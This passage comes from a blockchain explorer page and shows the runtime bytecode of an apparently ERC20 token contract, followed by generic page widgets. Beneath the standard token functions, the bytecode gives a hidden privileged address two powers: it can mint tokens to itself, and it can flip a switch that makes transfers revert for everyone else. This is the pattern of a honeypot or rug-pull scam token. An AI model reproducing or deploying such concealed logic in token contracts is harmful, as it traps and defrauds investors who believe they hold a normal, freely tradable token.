4565b820191906000526020600020905b8154815290600101906020018083116106a757829003601f168201915b5050505050905090565b6000806106d9610a81565b905060006106e7828661084f565b90508381101561072c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161072390611570565b60405180910390fd5b6107398286868403610a89565b60019250505092915050565b600080610750610a81565b905061075d818585610cde565b600191505092915050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff160361084c5780600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610808919061145e565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036109465780603560006101000a81548160ff0219169083151502179055505b50565b610951610a81565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d5906114de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a1757600080fd5b6000610a21610613565b90508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aef90611602565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e90611694565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c45919061120d565b60405180910390a3505050565b6000610c5e848461084f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cd85781811015610cca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc190611700565b60405180910390fd5b610cd78484848403610a89565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4490611792565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db390611824565b60405180910390fd5b610dc583610f53565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e43906118b6565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ee1919061145e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f45919061120d565b60405180910390a350505050565b610f5b610613565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614158015610fe45750600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b1561103a57603560009054906101000a900460ff1615611039576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103090611922565b60405180910390fd5b5b50565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b60008484015250505050565b6000601f19601f8301169050919050565b600061109f8261103d565b6110a98185611048565b93506110b9818560208601611059565b6110c281611083565b840191505092915050565b600060208201905081810360008301526110e78184611094565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061111f826110f4565b9050919050565b61112f81611114565b811461113a57600080fd5b50565b60008135905061114c81611126565b92915050565b6000819050919050565b61116581611152565b811461117057600080fd5b50565b6000813590506111828161115c565b92915050565b6000806040838503121561119f5761119e6110ef565b5b60006111ad8582860161113d565b92505060206111be85828601611173565b9150509250929050565b60008115159050919050565b6111dd816111c8565b82525050565b60006020820190506111f860008301846111d4565b92915050565b61120781611152565b82525050565b600060208201905061122260008301846111fe565b92915050565b600080600060608486031215611241576112406110ef565b5b600061124f8682870161113d565b93505060206112608682870161113d565b925050604061127186828701611173565b9150509250925092565b600060ff82169050919050565b6112918161127b565b82525050565b60006020820190506112ac6000830184611288565b92915050565b6000602082840312156112c8576112c76110ef565b5b60006112d68482850161113d565b91505092915050565b6112e881611114565b82525050565b600060208201905061130360008301846112df565b92915050565b60006020828403121561131f5761131e6110ef565b5b600061132d84828501611173565b91505092915050565b6000806040838503121561134d5761134c6110ef565b5b600061135b8582860161113d565b925050602061136c8582860161113d565b9150509250929050565b61137f816111c8565b811461138a57600080fd5b50565b60008135905061139c81611376565b92915050565b6000602082840312156113b8576113b76110ef565b5b60006113c68482850161138d565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061141657607f821691505b602082108103611429576114286113cf565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061146982611152565b915061147483611152565b925082820190508082111561148c5761148b61142f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006114c8602083611048565b91506114d382611492565b602082019050919050565b600060208201905081810360008301526114f7816114bb565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061155a602583611048565b9150611565826114fe565b604082019050919050565b600060208201905081810360008301526115898161154d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006115ec602483611048565b91506115f782611590565b604082019050919050565b6000602082019050818103600083015261161b816115df565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061167e602283611048565b915061168982611622565b604082019050919050565b600060208201905081810360008301526116ad81611671565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006116ea601d83611048565b91506116f5826116b4565b602082019050919050565b60006020820190508181036000830152611719816116dd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061177c602583611048565b915061178782611720565b604082019050919050565b600060208201905081810360008301526117ab8161176f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061180e602383611048565b9150611819826117b2565b604082019050919050565b6000602082019050818103600083015261183d81611801565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006118a0602683611048565b91506118ab82611844565b604082019050919050565b600060208201905081810360008301526118cf81611893565b9050919050565b7f4572726f72000000000000000000000000000000000000000000000000000000600082015250565b600061190c600583611048565b9150611917826118d6565b602082019050919050565b6000602082019050818103600083015261193b816118ff565b905091905056fea264697066735822122056a247ba7c7bc6ebf5956101ebc2873908faa9404e4907d6dd0cfd5984828b3f64736f6c63430008100033
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.